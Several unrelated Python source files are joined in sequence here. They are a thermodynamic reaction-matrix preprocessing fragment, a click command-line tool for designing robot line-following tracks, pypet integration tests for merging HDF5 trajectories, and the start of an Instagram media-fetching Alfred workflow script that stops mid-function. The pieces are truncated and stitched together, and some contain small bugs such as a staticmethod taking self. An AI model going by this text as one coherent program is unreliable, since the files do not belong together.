X[:, i] = x
G[:, i] = g
return X, G
def dG0_prime(self, reactions, pH=DEFAULT_PH, pMg=DEFAULT_PMG,
I=DEFAULT_IONIC_STRENGTH):
if type(reactions) != types.ListType:
reactions = [reactions]
dG0_r_prime = matrix(map(lambda r: r.dG0_prime(pH, pMg, I), reactions)).T
X, G = self.reactions_to_matrices(reactions)
U = X.T * self.C1 * X + \
X.T * self.C2 * G + \
G.T * self.C2.T * X + \
G.T * self.C3 * G
return dG0_r_prime, U
@staticmethod
def WriteCompoundAndCoeff(kegg_id, coeff):
if coeff == 1:
return kegg_id
else:
return "%g %s" % (coeff, kegg_id)
@staticmethod
def DictToReactionString(d):
"""String representation."""
left = []
right = []
for kegg_id, coeff in sorted(d.iteritems()):
_s = Preprocessing.WriteCompoundAndCoeff(kegg_id, -coeff)
if coeff < 0:
left.append(_s)
elif coeff > 0:
right.append(_s)
return "%s %s %s" % (' + '.join(left), '<=>', ' + '.join(right))
@staticmethod
def Analyze(self, x, g):
weights_rc = x.T * self.G1
weights_gc = x.T * self.G2 + g.T * self.G3
weights = weights_rc + weights_gc
res = []
for j in xrange(self.S.shape[1]):
d = {self.kegg_ids[i]: self.S[i, j]
for i in xrange(self.Nc)
if self.S[i, j] != 0}
r_string = self.DictToReactionString(d)
res.append({'w': weights[0, j],
'w_rc': weights_rc[0, j].round(4),
'w_gc': weights_gc[0, j].round(4),
'reaction_string': r_string})
res.sort(key=lambda d: abs(d['w']), reverse=True)
return res
def IsUsingGroupContributions(self, x, g):
weights_gc = x.T * self.G2 + g.T * self.G3
sum_w_gc = sum(abs(weights_gc).flat)
logging.info('sum(w_gc) = %.2g' % sum_w_gc)
return sum_w_gc > 1e-5
if __name__ == '__main__':
p = Preprocessing()
|
"""
Command line interface from Line Track Designer
"""
import click
from pathlib import Path
import logging
import webbrowser
from line_track_designer.track import Track
from line_track_designer.tile import Tile, Tiles
@click.group()
@click.option('-v', '--verbosity', is_flag=True, help='Set the verbosity')
def linetrack(verbosity):
"""Generate line following tracks for robots."""
if verbosity:
logging.basicConfig(format='%(levelname)s:%(message)s',
level=logging.INFO)
@linetrack.command()
@click.argument('filename', type=click.Path(exists=True))
def show(filename):
"""Show track FILENAME as PNG file.
FILENAME is a text file following the track file's conventions.
"""
track = Track.read(filename)
track.show()
@linetrack.command()
@click.argument('filename', type=click.Path(exists=True))
def write(filename):
"""Write track FILENAME in the command prompt."""
track = Track.read(filename)
click.echo(track)
logging.info('Track writed')
@linetrack.command()
@click.argument('filename', type=click.Path())
@click.argument('nrow', type=int)
@click.argument('ncol', type=int)
def create(filename, nrow, ncol):
"""Create empty track FILENAME.
NROW is the number of rows.
NCOL is the number of columns.
"""
track = Track.zeros(nrow, ncol)
track.save_txt(filename)
click.edit(filename=filename)
@linetrack.command()
@click.argument('filename', type=click.Path(exists=True))
def edit(filename):
"""Edit track FILENAME."""
logging.info('Editing track: {}'.format(filename))
click.edit(filename=filename)
@linetrack.command()
@click.argument('filename', type=click.Path(exists=True))
def addcol(filename):
"""Add a column to track FILENAME."""
track = Track.read(filename)
track.add_col()
track.save_txt(filename)
@linetrack.command()
@click.argument('filename', type=click.Path(exists=True))
def addrow(filename):
"""Add a row to track FILENAME."""
track = Track.read(filename)
track.add_row()
track.save_txt(filename)
@linetrack.command()
@click.argument('filename', type=click.Path(exists=True))
@click.argument('col', type=int)
def delcol(filename, col):
"""Delete column COL from track FILENAME.
COL is the number of the column to delete.
"""
track = Track.read(filename)
track.del_col(col)
track.save_txt(filename)
@linetrack.command()
@click.argument('filename', type=click.Path(exists=True))
@click.argument('row', type=int)
def delrow(filename, row):
"""Delete row ROW from track FILENAME.
ROW is the number of the row to delete.
"""
track = Track.read(filename)
track.del_row(row)
track.save_txt(filename)
@linetrack.command()
@click.argument('filename', type=click.Path(exists=True))
@click.option('-n', default=1, help='Number of rotations')
def rotate(filename, n):
"""Rotate track FILENAME."""
track = Track.read(filename)
track.rotate(n)
track.save_txt(filename)
@linetrack.command()
@click.argument('filename', type=click.Path(exists=True))
@click.option('-o', '--output', 'filename_png', default='',
help='Name of the PNG file')
@click.option('-s', '--show', is_flag=True, help='Show the file created')
def savepng(filename, filename_png, show):
"""Save track FILENAME as PNG file."""
track = Track.read(filename)
p = Path(filename)
if filename_png == '':
filename_png = p.with_suffix('.png')
track.save_img(filename_png)
if show:
track.show()
@linetrack.command()
@click.argument('filename', type=click.Path(exists=True))
@click.option('-o', '--output', 'filename_md', default='',
help='Name of the MD file')
@click.option('-n', '--name', 'name', default='Track',
prompt='Name', help='Name of the track')
@click.option('-d', '--description', 'description', default='',
prompt='Description', help='Description of the track')
def savemd(filename, filename_md, name, description):
"""Save track FILENAME as MD file."""
track = Track.read(filename, name)
p = Path(filename)
if filename_md == '':
filename_md = p.with_suffix('.md')
track.save_md(filename_md, description)
@linetrack.command()
@click.argument('filename', type=click.Path(exists=True))
def printing(filename):
"""Print track FILENAME."""
if click.confirm('Do you want to print the track?'):
track = Track.read(filename)
track.print_track()
@linetrack.command()
@click.argument('number', type=int)
@click.option('-o', '--orient', default=0, help='Orientation')
def showtile(number, orient):
"""Show tile NUMBER."""
t = Tile(number)
t.show(orient)
@linetrack.command()
def pdf():
"""Open the PDF file containing the tiles."""
Tiles.show()
@linetrack.command()
def doc():
"""Open the documentation."""
webbrowser.open('https://line-track-designer.readthedocs.io/en/latest/')
logging.info('Doc opened')
|
__author__ = '<NAME>'
import numpy as np
from pypet.parameter import Parameter
from pypet.utils.explore import cartesian_product
from pypet.environment import Environment
from pypet import pypetconstants
import logging
import os
import time
from scipy.stats import pearsonr
from pypet.tests.testutils.ioutils import run_suite, make_temp_dir, make_trajectory_name, \
parse_args, get_log_config
from pypet.tests.testutils.data import add_params, simple_calculations, TrajectoryComparator,\
multiply, create_param_dict
from pypet.tests.integration.environment_test import ResultSortTest, my_set_func, my_run_func
from pypet import merge_all_in_folder
class MergeTest(TrajectoryComparator):
tags = 'integration', 'hdf5', 'environment', 'merge'
def tearDown(self):
if hasattr(self, 'envs'):
for env in self.envs:
env.f_disable_logging()
super(MergeTest, self).tearDown()
def make_run(self,env):
### Make a test run
simple_arg = -13
simple_kwarg= 13.0
env.f_run(simple_calculations, simple_arg, simple_kwarg=simple_kwarg)
def make_environment(self, idx, filename, **kwargs):
#self.filename = make_temp_dir('experiments/tests/HDF5/test.hdf5')
logfolder = make_temp_dir(os.path.join('experiments','tests','Log'))
trajname = make_trajectory_name(self) + '__' +str(idx) +'_'
env = Environment(trajectory=trajname,filename=filename, file_title=trajname,
log_stdout=False,
large_overview_tables=True, log_config=get_log_config(),
**kwargs)
self.envs.append(env)
self.trajs.append( env.v_trajectory)
def test_merging_trajectories_in_different_subspace(self):
self.filenames = [make_temp_dir(os.path.join('experiments',
'tests',
'HDF5',
'merge_diff_subspace.hdf5')), 0, 0]
self.envs=[]
self.trajs = []
for irun,filename in enumerate(self.filenames):
if isinstance(filename,int):
filename = self.filenames[filename]
self.make_environment( irun, filename, wildcard_functions =
{('$', 'crun') : my_run_func, ('$set', 'crunset'): my_set_func})
self.param_dict={}
create_param_dict(self.param_dict)
for irun in [0,1,2]:
add_params(self.trajs[irun], self.param_dict)
self.explore(self.trajs[0])
self.explore2(self.trajs[1])
self.compare_explore_diff_subspace(self.trajs[2])
for irun in [0,1,2]:
self.make_run(self.envs[irun])
for irun in [0,1,2]:
self.trajs[irun].f_load_skeleton()
self.trajs[irun].f_load(load_parameters=pypetconstants.UPDATE_DATA,
load_derived_parameters=pypetconstants.UPDATE_DATA,
load_results=pypetconstants.UPDATE_DATA,
load_other_data=pypetconstants.UPDATE_DATA)
self.trajs[1].f_add_result('rrororo33o333o3o3oo3',1234567890)
self.trajs[1].f_store_item('rrororo33o333o3o3oo3')
self.trajs[2].f_add_result('rrororo33o333o3o3oo3',1234567890)
self.trajs[2].f_store_item('rrororo33o333o3o3oo3')
##f_merge without destroying the original trajectory
merged_traj = self.trajs[0]
merged_traj.f_merge(self.trajs[1], move_data=True,
delete_other_trajectory=True)
merged_traj.f_load(load_parameters=pypetconstants.UPDATE_DATA,
load_derived_parameters=pypetconstants.UPDATE_DATA,
load_results=pypetconstants.UPDATE_DATA,
load_other_data=pypetconstants.UPDATE_DATA)
self.compare_trajectories(merged_traj,self.trajs[2])
def test_merging_errors_if_trajs_do_not_match(self):
self.filenames = [make_temp_dir(os.path.join('experiments',
'tests',
'HDF5',
'merge_errors.hdf5')), 0]
self.envs=[]
self.trajs = []
for irun,filename in enumerate(self.filenames):
if isinstance(filename,int):
filename = self.filenames[filename]
self.make_environment( irun, filename)
self.param_dict={}
create_param_dict(self.param_dict)
for irun in [0,1]:
add_params(self.trajs[irun], self.param_dict)
self.explore(self.trajs[0])
self.explore(self.trajs[1])
for irun in [0,1]:
self.make_run(self.envs[irun])
for irun in [0,1]:
self.trajs[irun].f_load_skeleton()
self.trajs[irun].f_load(load_parameters=pypetconstants.UPDATE_DATA,
load_derived_parameters=pypetconstants.UPDATE_DATA,
load_results=pypetconstants.UPDATE_DATA,
load_other_data=pypetconstants.UPDATE_DATA)
self.trajs[0].f_add_parameter('Merging.Denied', 13)
##f_merge without destroying the original trajectory
merged_traj = self.trajs[0]
# We cannot merge trajectories which parameters differ
with self.assertRaises(TypeError):
merged_traj.f_merge(self.trajs[1])
self.trajs[1].f_add_parameter('Merging.Denied', 13.13)
# We cannot merge trajectories where parameters differ in type
with self.assertRaises(TypeError):
merged_traj.f_merge(self.trajs[1])
self.trajs[1].f_get('Denied').f_unlock()
self.trajs[1].f_get('Denied').f_set(15)
merged_traj.f_merge(self.trajs[1])
def test_merge_basic_within_same_file_only_adding_more_trials_copy_nodes(self):
self.filenames = [make_temp_dir(os.path.join('experiments',
'tests',
'HDF5',
'merge1.hdf5')), 0, 0]
self.merge_basic_only_adding_more_trials(True)
def test_merge_basic_within_same_file_only_adding_more_trials_move_nodes(self):
self.filenames = [make_temp_dir(os.path.join('experiments',
'tests',
'HDF5',
'merge1.hdf5')), 0, 0]
self.merge_basic_only_adding_more_trials(False)
def test_basic_within_same_file_and_skipping_duplicates_which_will_be_all(self):
self.filenames = [make_temp_dir(os.path.join('experiments',
'tests',
'HDF5',
'merge1.hdf5')), 0]
with self.assertRaises(ValueError):
self.basic_and_skipping_duplicates_which_will_be_all()
def test_basic_within_same_file_and_skipping_duplicates_which_leads_to_one_reamianing(self):
self.filenames = [make_temp_dir(os.path.join('experiments',
'tests',
'HDF5',
'merge1_one_remaining.hdf5')), 0, 0]
self. basic_and_skipping_duplicates_which_leads_to_one_remaining()
def test_basic_within_separate_file_and_skipping_duplicates_which_leads_to_one_reamianing(self):
self.filenames = [make_temp_dir(os.path.join('experiments',
'tests',
'HDF5',
'merge2_one_remaining.hdf5')),
make_temp_dir(os.path.join('experiments',
'tests',
'HDF5',
'merge3_one_remaining.hdf5')),
make_temp_dir(os.path.join('experiments',
'tests',
'HDF5',
'merge4_one_remaining.hdf5'))]
self. basic_and_skipping_duplicates_which_leads_to_one_remaining()
def test_merge_basic_with_separate_files_only_adding_more_trials(self):
self.filenames = [make_temp_dir(os.path.join('experiments',
'tests',
'HDF5',
'merge2trials.hdf5')),
make_temp_dir(os.path.join('experiments',
'tests',
'HDF5',
'merge3trials.hdf5')),
make_temp_dir(os.path.join('experiments',
'tests',
'HDF5',
'merge4trials.hdf5'))]
self.merge_basic_only_adding_more_trials(True)
def test_merge_basic_with_separate_files_only_adding_more_trials_slow_merge(self):
self.filenames = [make_temp_dir(os.path.join('experiments',
'tests',
'HDF5',
'slow_merge2.hdf5')),
make_temp_dir(os.path.join('experiments',
'tests',
'HDF5',
'slow_merge3.hdf5')),
make_temp_dir(os.path.join('experiments',
'tests',
'HDF5',
'slow_merge4.hdf5'))]
self.merge_basic_only_adding_more_trials(True, slow_merge=True)
def test_merge_basic_within_same_file_only_adding_more_trials_copy_nodes_test_backup(self):
self.filenames = [make_temp_dir(os.path.join('experiments',
'tests',
'HDF5',
'merge1_more_trials.hdf5')), 0, 0]
self.merge_basic_only_adding_more_trials_with_backup(True)
def test_merge_basic_within_same_file_only_adding_more_trials_delete_other_trajectory(self):
self.filenames = [make_temp_dir(os.path.join('experiments',
'tests',
'HDF5',
'merge1_more_trials.hdf5')), 0, 0]
self.merge_basic_only_adding_more_trials(False, True)
def merge_basic_only_adding_more_trials(self, copy_nodes=False, delete_traj=False,
slow_merge=False):
self.envs=[]
self.trajs = []
for irun,filename in enumerate(self.filenames):
if isinstance(filename,int):
filename = self.filenames[filename]
self.make_environment( irun, filename)
self.param_dict={}
create_param_dict(self.param_dict)
for irun in [0,1,2]:
add_params(self.trajs[irun], self.param_dict)
self.explore(self.trajs[0])
self.explore(self.trajs[1])
self.compare_explore_more_trials(self.trajs[2])
for irun in [0,1,2]:
self.make_run(self.envs[irun])
for irun in [0,1,2]:
self.trajs[irun].f_load_skeleton()
self.trajs[irun].f_load(load_parameters=pypetconstants.UPDATE_DATA,
load_derived_parameters=pypetconstants.UPDATE_DATA,
load_results=pypetconstants.UPDATE_DATA,
load_other_data=pypetconstants.UPDATE_DATA)
self.trajs[1].f_add_result('gg.rrororo33o333o3o3oo3',1234567890)
self.trajs[1].f_store_item('rrororo33o333o3o3oo3')
self.trajs[1].res.gg.v_annotations['lala'] = 'Sonnenschein'
self.trajs[1].f_store_item('gg')
self.trajs[2].f_add_result('gg.rrororo33o333o3o3oo3',1234567890)
self.trajs[2].f_store_item('rrororo33o333o3o3oo3')
self.trajs[2].res.gg.v_annotations['lala'] = 'Sonnenschein'
self.trajs[2].f_store_item('gg')
##f_merge without destroying the original trajectory
merged_traj = self.trajs[0]
self.trajs[1].f_remove_child('results', recursive=True)
merged_traj.f_merge(self.trajs[1], move_data=not copy_nodes,
delete_other_trajectory=delete_traj,
trial_parameter='trial',
slow_merge=slow_merge)
merged_traj.f_load(load_parameters=pypetconstants.UPDATE_DATA,
load_derived_parameters=pypetconstants.UPDATE_DATA,
load_results=pypetconstants.UPDATE_DATA,
load_other_data=pypetconstants.UPDATE_DATA)
self.compare_trajectories(merged_traj,self.trajs[2])
def merge_basic_only_adding_more_trials_with_backup(self,copy_nodes):
self.envs=[]
self.trajs = []
for irun,filename in enumerate(self.filenames):
if isinstance(filename,int):
filename = self.filenames[filename]
self.make_environment( irun, filename)
self.param_dict={}
create_param_dict(self.param_dict)
for irun in [0,1,2]:
add_params(self.trajs[irun],self.param_dict)
self.explore(self.trajs[0])
self.explore(self.trajs[1])
self.compare_explore_more_trials(self.trajs[2])
for irun in [0,1,2]:
self.make_run(self.envs[irun])
for irun in [0,1,2]:
self.trajs[irun].f_load_skeleton()
self.trajs[irun].f_load(load_parameters=pypetconstants.UPDATE_DATA,
load_derived_parameters=pypetconstants.UPDATE_DATA,
load_results=pypetconstants.UPDATE_DATA,
load_other_data=pypetconstants.UPDATE_DATA)
self.trajs[1].f_add_result('rrororo33o333o3o3oo3',1234567890)
self.trajs[1].f_store_item('rrororo33o333o3o3oo3')
self.trajs[2].f_add_result('rrororo33o333o3o3oo3',1234567890)
self.trajs[2].f_store_item('rrororo33o333o3o3oo3')
##f_merge without destroying the original trajectory
merged_traj = self.trajs[0]
merged_traj.f_merge(self.trajs[1], move_data=not copy_nodes, delete_other_trajectory=False, trial_parameter='trial',
backup_filename=1)
merged_traj.f_load_skeleton()
merged_traj.f_load(load_parameters=pypetconstants.UPDATE_DATA,
load_derived_parameters=pypetconstants.UPDATE_DATA,
load_results=pypetconstants.UPDATE_DATA,
load_other_data=pypetconstants.UPDATE_DATA)
self.compare_trajectories(merged_traj,self.trajs[2])
def basic_and_skipping_duplicates_which_leads_to_one_remaining(self, slow_merge=False):
self.envs=[]
self.trajs = []
ntrajs = len(self.filenames)
for irun,filename in enumerate(self.filenames):
if isinstance(filename,int):
filename = self.filenames[filename]
self.make_environment( irun, filename)
self.param_dict={}
create_param_dict(self.param_dict)
for irun in range(ntrajs):
add_params(self.trajs[irun],self.param_dict)
self.explore(self.trajs[0])
self.explore_trials_differently(self.trajs[1])
self.compare_explore_more_trials_with_removing_duplicates(self.trajs[2])
for irun in range(ntrajs):
self.make_run(self.envs[irun])
for irun in range(ntrajs):
self.trajs[irun].f_load_skeleton()
self.trajs[irun].f_load(load_parameters=pypetconstants.UPDATE_DATA,
load_derived_parameters=pypetconstants.UPDATE_DATA,
load_results=pypetconstants.UPDATE_DATA,
load_other_data=pypetconstants.UPDATE_DATA)
self.trajs[1].f_add_result('rrororo33o333o3o3oo3',1234567890)
self.trajs[1].f_store_item('rrororo33o333o3o3oo3')
self.trajs[2].f_add_result('rrororo33o333o3o3oo3',1234567890)
self.trajs[2].f_store_item('rrororo33o333o3o3oo3')
run_name = pypetconstants.FORMATTED_RUN_NAME % 1
run_name2 = pypetconstants.FORMATTED_RUN_NAME % 5
self.trajs[1].f_add_result('%s.rrr' % run_name, 123)
self.trajs[1].f_store_item('%s.rrr' % run_name)
self.trajs[2].f_add_result('%s.rrr' % run_name2, 123)
self.trajs[2].f_store_item('%s.rrr' % run_name2)
self.trajs[1].f_add_result('Ignore.Me', 42)
self.trajs[1].f_apar('Ignore.Me', 42)
self.trajs[1].f_adpar('Ignore.Me', 42)
##f_merge without destroying the original trajectory
merged_traj = self.trajs[0]
merged_traj.f_merge(self.trajs[1], move_data=False,
delete_other_trajectory=False,
remove_duplicates=True,
ignore_data=('results.Ignore.Me', 'parameters.Ignore.Me',
'derived_parameters.Ignore.Me'),
slow_merge=slow_merge)
merged_traj.f_load_skeleton()
merged_traj.f_load(load_parameters=pypetconstants.UPDATE_DATA,
load_derived_parameters=pypetconstants.UPDATE_DATA,
load_results=pypetconstants.UPDATE_DATA,
load_other_data=pypetconstants.UPDATE_DATA)
self.compare_trajectories(merged_traj,self.trajs[2])
def basic_and_skipping_duplicates_which_will_be_all(self):
self.envs=[]
self.trajs = []
for irun,filename in enumerate(self.filenames):
if isinstance(filename,int):
filename = self.filenames[filename]
self.make_environment( irun, filename)
self.param_dict={}
create_param_dict(self.param_dict)
for irun in [0,1]:
add_params(self.trajs[irun],self.param_dict)
self.explore(self.trajs[0])
self.explore(self.trajs[1])
for irun in [0,1]:
self.make_run(self.envs[irun])
for irun in [0,1]:
self.trajs[irun].f_load_skeleton()
self.trajs[irun].f_load(load_parameters=pypetconstants.UPDATE_DATA,
load_derived_parameters=pypetconstants.UPDATE_DATA,
load_results=pypetconstants.UPDATE_DATA,
load_other_data=pypetconstants.UPDATE_DATA)
self.trajs[0].f_add_result('rrororo33o333o3o3oo3',1234567890)
self.trajs[0].f_store_item('rrororo33o333o3o3oo3')
self.trajs[1].f_add_result('rrororo33o333o3o3oo3',1234567890)
self.trajs[1].f_store_item('rrororo33o333o3o3oo3')
##f_merge without destroying the original trajectory
merged_traj = self.trajs[0]
merged_traj.f_merge(self.trajs[1], move_data=False, delete_other_trajectory=False, remove_duplicates=True)
merged_traj.f_load_skeleton()
merged_traj.f_load(load_parameters=pypetconstants.UPDATE_DATA,
load_derived_parameters=pypetconstants.UPDATE_DATA,
load_results=pypetconstants.UPDATE_DATA,
load_other_data=pypetconstants.UPDATE_DATA)
self.compare_trajectories(merged_traj,self.trajs[1])
def explore(self, traj):
self.explored ={'Normal.trial': [0,1],
'Numpy.double': [np.array([1.0,2.0,3.0,4.0]), np.array([-1.0,3.0,5.0,7.0])]}
traj.f_explore(cartesian_product(self.explored, ('Numpy.double','Normal.trial')))
def explore2(self, traj):
self.explored2 ={'Normal.trial': [0,1],
'Normal.int': [44, 45]}
traj.f_explore(cartesian_product(self.explored2, ('Normal.int','Normal.trial') ))
def explore_trials_differently(self, traj):
self.explored ={'Normal.trial': [0,1],
'Numpy.double': [np.array([-1.0,2.0,3.0,5.0]), np.array([-1.0,3.0,5.0,7.0])]}
traj.f_explore(cartesian_product(self.explored, ('Numpy.double','Normal.trial')))
def compare_explore_diff_subspace(self,traj):
self.explored ={'Normal.trial': [0,1,0,1,0,1,0,1],
'Numpy.double': [np.array([1.0,2.0,3.0,4.0]),
np.array([1.0,2.0,3.0,4.0]),
np.array([-1.0,3.0,5.0,7.0]),
np.array([-1.0,3.0,5.0,7.0]),
np.array([1.0,2.0,3.0,4.0]),
np.array([1.0,2.0,3.0,4.0]),
np.array([1.0,2.0,3.0,4.0]),
np.array([1.0,2.0,3.0,4.0])],
'Normal.int' : [42, 42, 42, 42, 44, 44, 45, 45]}
traj.f_explore(self.explored)
def compare_explore_more_trials_with_removing_duplicates(self,traj):
self.explored ={'Normal.trial': [0,1,0,1,0,1],
'Numpy.double': [np.array([1.0,2.0,3.0,4.0]),
np.array([1.0,2.0,3.0,4.0]),
np.array([-1.0,3.0,5.0,7.0]),
np.array([-1.0,3.0,5.0,7.0]),
np.array([-1.0,2.0,3.0,5.0]),
np.array([-1.0,2.0,3.0,5.0])]}
traj.f_explore(self.explored)
def compare_explore_more_trials(self,traj):
self.explored ={'Normal.trial': [0,1,0,1,2,3,2,3],
'Numpy.double': [np.array([1.0,2.0,3.0,4.0]),
np.array([1.0,2.0,3.0,4.0]),
np.array([-1.0,3.0,5.0,7.0]),
np.array([-1.0,3.0,5.0,7.0]),
np.array([1.0,2.0,3.0,4.0]),
np.array([1.0,2.0,3.0,4.0]),
np.array([-1.0,3.0,5.0,7.0]),
np.array([-1.0,3.0,5.0,7.0])]}
traj.f_explore(self.explored)
# def test_merging_wildcard(self):
# self.filenames = [make_temp_dir('experiments/tests/HDF5/merge_wild.hdf5'), 0, 0]
#
# self.envs=[]
# self.trajs = []
#
# for irun,filename in enumerate(self.filenames):
# if isinstance(filename,int):
# filename = self.filenames[filename]
#
# self.make_environment( irun, filename)
#
# self.trajs[0].f_add_derived_parameter('$', 45)
# self.trajs[1].f_add_derived_parameter('$', 47)
#
# for traj in self.trajs:
# traj.f_store()
# self.trajs[0].f_merge(self.trajs[1])
# pass
class TestMergeResultsSort(ResultSortTest):
tags = 'integration', 'hdf5', 'environment', 'merge'
def setUp(self):
super(TestMergeResultsSort,self).setUp()
env2 = Environment(trajectory=self.trajname+'2',filename=self.filename,
file_title=self.trajname,
log_stdout=False,
log_config=get_log_config(),
multiproc=self.multiproc,
wrap_mode=self.mode,
ncores=self.ncores)
traj2 = env2.v_trajectory
traj2.v_standard_parameter=Parameter
traj2.f_add_parameter('x',0)
traj2.f_add_parameter('y',0)
self.env2=env2
self.traj2=traj2
def tearDown(self):
if hasattr(self, 'env'):
self.env.f_disable_logging()
if hasattr(self, 'env2'):
self.env2.f_disable_logging()
super(TestMergeResultsSort, self).tearDown()
def test_merge_normally(self):
self.explore(self.traj)
self.explore2(self.traj2)
len1 = len(self.traj)
len2 = len(self.traj2)
self.assertTrue(len1==5)
self.assertTrue(len2==5)
self.env.f_run(multiply)
self.env2.f_run(multiply)
self.traj.f_merge(self.env2.v_trajectory)
self.assertTrue(len(self.traj)==len1+len2)
self.traj.f_load(load_results=pypetconstants.UPDATE_DATA)
self.check_if_z_is_correct(self.traj)
def test_merge_remove_duplicates(self):
self.explore(self.traj)
self.explore2(self.traj2)
len1 = len(self.traj)
len2 = len(self.traj2)
self.assertTrue(len1==5)
self.assertTrue(len2==5)
self.env.f_run(multiply)
self.env2.f_run(multiply)
self.traj.f_merge(self.env2.v_trajectory,remove_duplicates=True)
self.assertTrue(len(self.traj)==6)
self.traj.f_load(load_results=pypetconstants.UPDATE_DATA)
self.check_if_z_is_correct(self.traj)
def explore(self,traj):
self.explore_dict={'x':[0,1,2,3,4],'y':[1,1,2,2,3]}
traj.f_explore(self.explore_dict)
def explore2(self,traj):
self.explore_dict={'x':[0,1,2,3,4],'y':[1,1,2,2,42]}
traj.f_explore(self.explore_dict)
class TestConsecutiveMerges(TrajectoryComparator):
tags = 'integration', 'hdf5', 'environment', 'merge', 'consecutive_merge'
def check_if_z_is_correct(self,traj):
for x in range(len(traj)):
traj.v_idx=x
self.assertTrue(traj.crun.z==traj.x*traj.y,' z != x*y: %s != %s * %s' %
(str(traj.crun.z),str(traj.x),str(traj.y)))
traj.v_idx=-1
def set_mode(self):
self.mode = 'LOCK'
self.multiproc = False
self.ncores = 1
self.use_pool=True
self.log_stdout=False
self.freeze_input=False
def explore(self,traj):
self.explore_dict={'x':range(10),'y':range(10)}
traj.f_explore(self.explore_dict)
def setUp(self):
self.envs = []
self.trajs = []
self.set_mode()
self.filename = make_temp_dir(os.path.join('experiments','tests','HDF5','test.hdf5'))
self.trajname = make_trajectory_name(self)
def _make_env(self, idx, filename=None):
if filename is None:
filename = self.filename
return Environment(trajectory=self.trajname+str(idx),filename=filename,
file_title=self.trajname,
log_stdout=False,
log_config=get_log_config(),
multiproc=self.multiproc,
wrap_mode=self.mode,
ncores=self.ncores)
@staticmethod
def strictly_increasing(L):
return all(x<y for x, y in zip(L, L[1:]))
def test_consecutive_merges(self):
ntrajs = 41
for irun in range(ntrajs):
self.envs.append(self._make_env(irun))
self.trajs.append(self.envs[-1].v_traj)
self.trajs[-1].f_add_parameter('x',0)
self.trajs[-1].f_add_parameter('y',0)
self.explore(self.trajs[-1])
for irun in range(ntrajs):
self.envs[irun].f_run(multiply)
merge_traj = self.trajs[0]
merge_traj.f_load_skeleton()
timings = []
for irun in range(1, ntrajs):
start = time.time()
merge_traj.f_merge(self.trajs[irun], backup=False, consecutive_merge=True)
end = time.time()
delta = end -start
timings.append(delta)
# Test if there is no linear dependency for consecutive merges:
if self.strictly_increasing(timings) and len(timings) > 1:
raise ValueError('Timings %s are strictly increasing' % str(timings))
r, alpha = pearsonr(range(len(timings)), timings)
logging.error('R and Alpha of consecutive merge test %s' % str((r,alpha)))
if alpha < 0.001 and r > 0:
raise ValueError( 'R and Alpha of consecutive merge test %s\n' % str((r,alpha)),
'Timings %s are lineary increasing' % str(timings))
merge_traj.f_store()
merge_traj.f_load(load_data=2)
self.check_if_z_is_correct(merge_traj)
def test_merge_all_in_folder(self):
self.filename = make_temp_dir(os.path.join('experiments','tests','HDF5', 'subfolder',
'test.hdf5'))
path, _ = os.path.split(self.filename)
ntrajs = 4
total_len = 0
for irun in range(ntrajs):
new_filename = os.path.join(path, 'test%d.hdf5' % irun)
self.envs.append(self._make_env(irun, filename=new_filename))
self.trajs.append(self.envs[-1].v_traj)
self.trajs[-1].f_add_parameter('x',0)
self.trajs[-1].f_add_parameter('y',0)
self.explore(self.trajs[-1])
total_len += len(self.trajs[-1])
for irun in range(ntrajs):
self.envs[irun].f_run(multiply)
merge_traj = merge_all_in_folder(path, delete_other_files=True)
merge_traj.f_load(load_data=2)
self.assertEqual(len(merge_traj), total_len)
self.check_if_z_is_correct(merge_traj)
def test_merge_many(self):
ntrajs = 4
for irun in range(ntrajs):
self.envs.append(self._make_env(irun))
self.trajs.append(self.envs[-1].v_traj)
self.trajs[-1].f_add_parameter('x',0)
self.trajs[-1].f_add_parameter('y',0)
self.explore(self.trajs[-1])
for irun in range(ntrajs):
self.envs[irun].f_run(multiply)
merge_traj = self.trajs[0]
total_len = 0
for traj in self.trajs:
total_len += len(traj)
merge_traj.f_merge_many(self.trajs[1:])
merge_traj.f_load(load_data=2)
self.assertEqual(len(merge_traj), total_len)
self.check_if_z_is_correct(merge_traj)
def tearDown(self):
for env in self.envs:
env.f_disable_logging()
super(TestConsecutiveMerges, self).tearDown()
if __name__ == '__main__':
opt_args = parse_args()
run_suite(**opt_args) |
<filename>scratch.py
import os
import urllib
import time
from dependencies.instagram import InstagramAPI, InstagramAPIError, InstagramClientError
from dependencies.instagram import models
from string import Template
import subprocess
from operator import attrgetter
from my_instagram_api import MyInstagramAPI, UserSet
import dependencies.simplejson as json
import datetime
from functools import wraps
import inspect
# Errors
from dependencies.instagram.httplib2 import ServerNotFoundError
# Instagram API Errors
PRIVATE_USER = 'APINotAllowedError'
RATE_LIMITED = 'Rate limited'
INVALID_RESOURCE = 'APINotFoundError'
INSUFFICIENT_SCOPE = 'OAuthPermissionsException'
INVALID_TOKEN = 'OAuth<PASSWORD>'
INVALID_PARAMETERS = 'APIInvalidParametersError'
# globals
global _api
global DEBUG
DEBUG = False
HOME = os.environ['HOME']
CACHE_DIR = HOME + '/Library/Caches/com.runningwithcrayons.Alfred-2/Workflow Data/com.dalimatt.Instastalk'
DATA_DIR = HOME + '/Library/Application Support/Alfred 2/Workflow Data/com.dalimatt.Instastalk'
# Instantiate the instagram api
_api = MyInstagramAPI()
######################################################################
################### Primary Instagram functions ######################
######################################################################
def media_of_users(users, min_timestamp=None, max_timestamp=None):
"""Get recent media of users followed by a particular user"""
# Compute minimum UNIX timestamp, default is 7 days previous to current timestamp
if not min_timestamp:
DAY = 24*60*60 # seconds in a day
now = int(time.time())
min_timestamp = now - 7*DAY
min_timestamp = int(min_timestamp) # instagram needs ints
max_timestamp = int(max_timestamp)
# Fetch the media of all the follows of the user within the prescribed timeframe
total_media = []
for idx, user in enumerate(users):
params = {'user_id': user.id,
'max_timestamp': max_timestamp,
'min_timestamp': min_timestamp
}
new_media = user_media(**params)
# new_media should be -1 if the user is private and not accessible
if new_media != -1:
myprint('{0} of {1}. Got {2} media from user: {3}'.format(
idx+1, len(users), len(new_media), user.username))
if new_media:
total_media += new_media
else:
myprint('{0} of {1}. User {2} is private.'.format(
idx+1, len(users), user.username))
# Return the media sorted from most recent to least
return sorted(total_media, key=attrgetter('created_time'), reverse=True)
def user_media(user_id, verbose=False, max_pages=10, **kwargs):
"""Grab all media (up to *max_pages*) of a user"""
try:
user = _api.user(user_id=user_id)
except InstagramAPIError as err:
if err.error_type == PRIVATE_USER:
return -1
else:
raise err
media_per_page = _api.api_results_per_page['user_recent_media']
total_media_count = user.counts['media']
pages_required_for_all_media = int(total_media_count/media_per_page) + 1
total_media_to_be_retrieved = min(total_media_count,
max_pages * media_per_page)
if verbose:
